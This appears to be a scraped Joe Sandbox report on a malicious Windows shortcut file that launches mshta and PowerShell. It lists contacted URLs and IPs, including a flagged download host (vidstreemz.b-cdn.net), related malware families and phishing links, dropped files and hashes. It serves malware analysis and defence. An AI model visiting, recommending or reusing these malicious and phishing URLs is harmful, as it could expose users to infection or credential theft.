https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.css?	mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-hebrew-500-normal.woff2)	mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg);	mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7852000.00000004.00000020.00020000.00000000.sdmp, unconfigured[1].css.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-900-normal.woff)	mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://vidstreemz.b-cdn.net/nexto...	mshta.exe, 00000004.00000002.2700827513.00000279E77E0000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://fonts.bunny.net/rubik/files/rubik-latin-ext-300-normal.woff)	css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://bunny.net/v2/images/bunnynet-logo.svgb(	mshta.exe, 00000004.00000002.2700827513.00000279E77E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-hebrew-400-normal.woff)	css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://bunny.net(	mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-latin-500-normal.woff2)	mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/p	mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bunny.net/	mshta.exe, 00000004.00000002.2702545801.00000279EC286000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-aW	mshta.exe, 00000004.00000002.2700827513.00000279E781C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-hebrew-300-normal.woff)	mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-700-normal.woff2)	mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-400-normal.woff)	css[1].css.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-400-normal.woff2)	mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-	mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bunny.net/v2/images/bunnynet-logo.svgx	mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-300-normal.woff)	css[1].css.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://bunny.net/v2/images/bunnynet-logo.svg...	mshta.exe, 00000004.00000002.2700827513.00000279E77E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7898000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bunny.net/v2/images/bunnynet-logo.svgcss/unconfigured.css	mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.ver)	svchost.exe, 00000006.00000002.2701659030.000001BD6B490000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV2/C:	svchost.exe, 00000006.00000003.1498181186.000001BD6B320000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-latin-900-normal.woff)	mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg7X	mshta.exe, 00000004.00000002.2700827513.00000279E7898000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-latinD	mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://fonts.bunny.net/	mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-500-normal.woff)	mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-cyrilli	mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-900-normal.woff2)	mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://vidstreemz.b-cdn.net/nexto$global:?	powershell.exe	true	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-500-normal.woff2)	css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-latin-300-normal.woff2)	mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E781C000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://vidstreemz.b-cdn.net/nextoC:	mshta.exe, 00000004.00000002.2698471609.00000271E5540000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://vidstreemz.b-cdn.net/nexto(	mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-latin-ext-300-normal.woff2)	css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normw	mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-300-normal.woff2)	css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-700-normal.woff2)	css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-latin-ext-900-normal.woff2)	mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://bunny.net/%z	mshta.exe, 00000004.00000002.2702545801.00000279EC286000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-latin-700-normal.woff)	css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-700-normal.woff)	css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://vidstreemz.b-cdn.net/	mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-400-normal.woff2)	mshta.exe, 00000004.00000002.2700827513.00000279E781C000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://vidstreemz.b-cdn.net/nexto;	mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://bunny.net/v	mshta.exe, 00000004.00000002.2702545801.00000279EC286000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://vidstreemz.b-cdn.net/nextoubik:300	mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://bunny.net/x	mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bunny.net/t	mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-latin-900-normal.woff2)	mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://bunny.net/l	mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-900-normal.woff)	mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/	mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-400-normal.woff)	css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://vidstreemz.b-cdn.net/nextoH	mshta.exe, 00000004.00000002.2699008025.00000271E5690000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-latin-ext-700-normal.woff2)	mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-400-normal.woff)	mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-latin-ext-400-normal.woff2)	css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normalformat(	mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-500-normal.woff2)	mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://vidstreemz.b-cdn.net/nextoY	mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://bunny.net/X	mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://bunny.net/S	mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.	mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg...	mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bunny.net/O	mshta.exe, 00000004.00000002.2702545801.00000279EC286000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-hebrew-300-normal.woff2)	mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-hebrew-500-normal.woff)	css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://bunny.net/P	mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-500-normal.woff2)	mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-500-normal.woff)	css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-hebrew-900-normal.woff2)	css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-latin-ext-400-normal.woff)	css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://vidstreemz.b-cdn.net/nextoM	mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://vidstreemz.b-cdn.net/nextonAsV	mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://bunny.net/L	mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://vidstreemz.b-cdn.net/nextoi	mshta.exe, 00000004.00000002.2697931791.0000008398745000.00000004.00000010.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-300-normal.woff2)	mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://vidstreemz.b-cdn.net/nextoc	mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-300-normal.woff)	mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	Avira URL Cloud: safe	unknown
https://bunny.net/Z	mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg...-	mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fonts.bunny.net/rubik/files/rubik-latin-ext-500-normal.woff)	mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	false	Avira URL Cloud: safe	unknown

IP	Domain	Country	ASN	ASN Name	Malicious
169.150.236.104	bunnyfonts.b-cdn.net	United States	2711	SPIRITTEL-ASUS	false
169.150.247.39	bunny.net	United States	2711	SPIRITTEL-ASUS	false
169.150.247.36	bunnycdn.com	United States	2711	SPIRITTEL-ASUS	false
138.199.36.7	vidstreemz.b-cdn.net	European Union	51964	ORANGE-BUSINESS-SERVICES-IPSN-ASNFR	true
169.150.247.37	bunnycdn.b-cdn.net	United States	2711	SPIRITTEL-ASUS	false

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1512349
Start date and time:	2024-09-17 09:22:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	8t6beMY1wO.lnk renamed because original name is a hash value
Original Sample Name:	4a37a2af26ce9de3b828c5a92320bbefa6e91b6f1a4ad67c4f701729c0ff92eb.lnk
Detection:	MAL
Classification:	mal84.winLNK@7/12@5/6
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .lnk

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
169.150.236.104	PDp2UpMXz1.lnk	Get hash	malicious	Unknown	Browse	fonts.bunny.net/css?family=Rubik:300,400,500,700,900
169.150.247.39	https://softworldenterprise.com	Get hash	malicious	Unknown	Browse	cdn.rawgit.com/michalsnik/aos/2.1.1/dist/aos.js
	http://cdn.bootcdn.net	Get hash	malicious	Unknown	Browse	cdn.bootcdn.net/
	PAYNOW_2023_08_002783pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.openlend.lat/aw8o/
	fjerbregners_patrol.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.openlend.lat/aw8o/?1NM6e=JwP18BaQn2gAMbwzAk/tzHq1rHqPkgowxzXz/N2AVg5llpqPoDBUT4Fbw9qJesVKC8w5QoNuWE8SYi183Rf2cdVRH8sDFcjA1Q==&P4=_n5TPHiTKZj
169.150.247.36	https://trk.pmifunds.com/y.z?l=http://security1.b-cdn.net&j=375634604&e=3028&p=1&t=h&D6EBE0CCEBB74CE191551D6EE653FA1E	Get hash	malicious	Unknown	Browse	security1.b-cdn.net/
	https://softworldinc.wpengine.com	Get hash	malicious	Unknown	Browse	cdn.rawgit.com/michalsnik/aos/2.1.1/dist/aos.js
	http://office365secure-thresholdacoustics-q5cdxz-my-sharepoint-com.b-cdn.net	Get hash	malicious	Unknown	Browse	office365secure-thresholdacoustics-q5cdxz-my-sharepoint-com.b-cdn.net/favicon.ico

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bunnycdn.com	12TtMAeYOD.lnk	Get hash	malicious	Unknown	Browse	169.150.236.104
	eodJLLo3Px.lnk	Get hash	malicious	Unknown	Browse	169.150.236.105
	PDp2UpMXz1.lnk	Get hash	malicious	Unknown	Browse	169.150.247.39
	https://mato-camp-v1.b-cdn.net/kesty	Get hash	malicious	Unknown	Browse	169.150.247.38
	http://169.150.221.147	Get hash	malicious	Unknown	Browse	37.19.207.34
	https://rolexz.b-cdn.net/Wi0n0MntyEr00170887/index.html	Get hash	malicious	Unknown	Browse	143.244.50.89
	https://www.cognitoforms.com/Pales1/Onepdf	Get hash	malicious	Unknown	Browse	185.59.220.194
bunnycdn.b-cdn.net	12TtMAeYOD.lnk	Get hash	malicious	Unknown	Browse	169.150.236.104
	eodJLLo3Px.lnk	Get hash	malicious	Unknown	Browse	169.150.247.38
	PDp2UpMXz1.lnk	Get hash	malicious	Unknown	Browse	169.150.247.37
	https://mato-camp-v1.b-cdn.net/kesty	Get hash	malicious	Unknown	Browse	169.150.247.39
	http://169.150.221.147	Get hash	malicious	Unknown	Browse	185.152.66.243
	https://rolexz.b-cdn.net/Wi0n0MntyEr00170887/index.html	Get hash	malicious	Unknown	Browse	143.244.50.83
	https://www.cognitoforms.com/Pales1/Onepdf	Get hash	malicious	Unknown	Browse	89.187.165.194
vidstreemz.b-cdn.net	Video%20HD%20%281080p%29.lnk.mal.lnk	Get hash	malicious	Unknown	Browse	169.150.247.40
bunnyfonts.b-cdn.net	12TtMAeYOD.lnk	Get hash	malicious	Unknown	Browse	169.150.236.105
	eodJLLo3Px.lnk	Get hash	malicious	Unknown	Browse	169.150.247.38
	PDp2UpMXz1.lnk	Get hash	malicious	Unknown	Browse	169.150.236.104
	https://url.uk.m.mimecastprotect.com/s/mPYbC6R8kf47GAUxtNC5T-0g?domain=tplshare.com	Get hash	malicious	HTMLPhisher	Browse	169.150.247.38
	https://7b14357e6ed5ac4dfd72842ddaaaed9f.ipfscdn.io/ipfs/QmenmshJ1Lkb1NoEFFwbJh7REUP2Z4SDr5eZL3JXuJLWkR#info@titlesqld.com.au	Get hash	malicious	HTMLPhisher	Browse	169.150.247.36
	https://ipfs.io/ipfs/QmeKeCuc6egp3ZX5SzEwqrZmh738etEgdSeQ2masEZovkQ/	Get hash	malicious	Unknown	Browse	169.150.247.37
	https://ipfs.io/ipfs/bafybeicqb5zaheslaimrate6trmguoxmuxic2uttieu6w3rxzd7xjjhsgm/roundcube.html#adi-websupport-uk@adiglobal.com	Get hash	malicious	HTMLPhisher	Browse	169.150.247.37
	http://arianarings.com	Get hash	malicious	Unknown	Browse	169.150.247.38
	http://url103.dignitycampaign.net/ls/click?upn=u001.Cas5ugePNtSf1mSWabrqo3mcJtdueilvOPTgzdlEpUd4GqCBNMVtW-2F-2F2wgGqCLpTN6dAfdijLlYq9iwquJXmE-2BZj79F37Z0CckED5TsG4fQ25o-2Fg-2FPDuwQBBWHkJ8RPrCF5saPUwaAjeZZiD8h-2FB9W48m4tIaN6GGErXkSFKFmDgBEYW1T7k-2FnXnvn8ldLi-2FIdfk0aRSirefRJxNUdOIGpZfncANcS7uFNatgOPxV2Ygm6fLOUWLotwEqsin4Y1CmtZ7BxfF5foNolE-2Boa25K-2B7wPI3V-2B767Ve4mOhPgJzLgSnGmthLVhWy6BYQf00QNI659fk8q12w02DBMlmMrw3khDr3cnNgYYng2Y5i7BXuipr6DyeGT98fM-2FKBVEQSrbKIquH3JWJaaXzReEynWFW3nTYFz4s5xNRnFU5AokDAcZstvVwxKq-2FJ1IjM1twMf6Hwg_J4YDns4pksLrb17hOXi2aOEwqj3m3dsJSi8gSl9zOoLhblODLjz6IKGTmKF92YKf5UEx9qOPJhvHxt6OvXPWhTIMtIICg1dYT0JxHA0xPVOIL6-2FatGunkes1VHfyRgkBTjXb0N8OIv5rbfThOrNJV8o4LJaaqlIOJB8KNeMcZLv1BO01a-2BZFPSvVNpAIaUaUnS-2BTtMnNrsqDBXNDQiQ2C60GIMOxXkEBDcUqmXWKAXHT2jyJKnE-2BTVX7Dn6v15EXXnFGV7DsBJuyOfxy4Jpp-2FDgxjoJYvwKKleeNMeZbnV7GSaFm53K3rrMP7FHypDrTj5gZolkQN74G665MiZOGOEsJpZBxGWUmRe5KD1lnqv9UsmS5oXGuT59ef-2B-2BOIJwozGuQ8LcLU9sq2bhaxr5QKojdGSLYHkQV48pY3diE-2FSKipsOxgeSp8hri35emljCrDJ8o2gvEcqTrgSbi5z9cBSKny1JK-2FAw-2B-2Bt5GdKd66pp3fqQXb-2FO03pmb7PSvgIGO-2BeUcgeDGkShCS6uwIbaWf92ZS-2BRnf-2BH4JXvcFqQFMHG6QluReLkOtpCzV5c3fz0XkA9GRQTJKj7LLrgRu3TEig-3D-3D	Get hash	malicious	Unknown	Browse	169.150.247.37
	https://bityl.co/Rdhj#MmpKcFFEVVI2TVllaWsyVHoxbTVjNVQ2OFJkV0I2UW53emdGdFlabWtLYlFDd3ZmMjIydmh0VVc3SEJnZUNkeG11THhoRWM4cS95OXhmejFJQXRJWlE9PQ__	Get hash	malicious	Phisher	Browse	169.150.247.37

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	12TtMAeYOD.lnk	Get hash	malicious	Unknown	Browse	169.150.236.104 169.150.247.39 169.150.247.36 138.199.36.7 169.150.247.37
	eodJLLo3Px.lnk	Get hash	malicious	Unknown	Browse	169.150.236.104 169.150.247.39 169.150.247.36 138.199.36.7 169.150.247.37
	PDp2UpMXz1.lnk	Get hash	malicious	Unknown	Browse	169.150.236.104 169.150.247.39 169.150.247.36 138.199.36.7 169.150.247.37
	SecuriteInfo.com.Win32.MalwareX-gen.8690.29614.exe	Get hash	malicious	LummaC, Vidar	Browse	169.150.236.104 169.150.247.39 169.150.247.36 138.199.36.7 169.150.247.37
	9poHPPZxlB.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, Xmrig	Browse	169.150.236.104 169.150.247.39 169.150.247.36 138.199.36.7 169.150.247.37
	file.exe	Get hash	malicious	Vidar	Browse	169.150.236.104 169.150.247.39 169.150.247.36 138.199.36.7 169.150.247.37
	Scanned Purchase Copy.vbs	Get hash	malicious	FormBook, GuLoader	Browse	169.150.236.104 169.150.247.39 169.150.247.36 138.199.36.7 169.150.247.37
	Faktura_VAT__U2409161195150793564#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	169.150.236.104 169.150.247.39 169.150.247.36 138.199.36.7 169.150.247.37
	SOLICITUD DE PRESUPUESTO 09-16-2024#U00b7pdf.vbs	Get hash	malicious	GuLoader, Lokibot	Browse	169.150.236.104 169.150.247.39 169.150.247.36 138.199.36.7 169.150.247.37
	Document BT24#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	169.150.236.104 169.150.247.39 169.150.247.36 138.199.36.7 169.150.247.37

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 8t6beMY1wO.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\css[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\css[1].css

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\unconfigured[1].css

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\il-bg-black-flower[1].svg

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32ihunj4.mp3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mo1p1wfj.apt.ps1

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Static File Info

General

File Icon

Static Windows Shortcut Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
8t6beMY1wO.lnk

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8021988604331967
Encrypted:	false
SSDEEP:	1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAz:RJE+Lfki1GjHwU/+vVhWqpq
MD5:	C63F18309CD9DB1790D40F9D1E3054F8
SHA1:	DFB47A0B3EC21E13A760E8CB259F33446C8BEC19
SHA-256:	2AD0118506CA1408D673932932342000871350B401023C92FAA16037444D0DD6
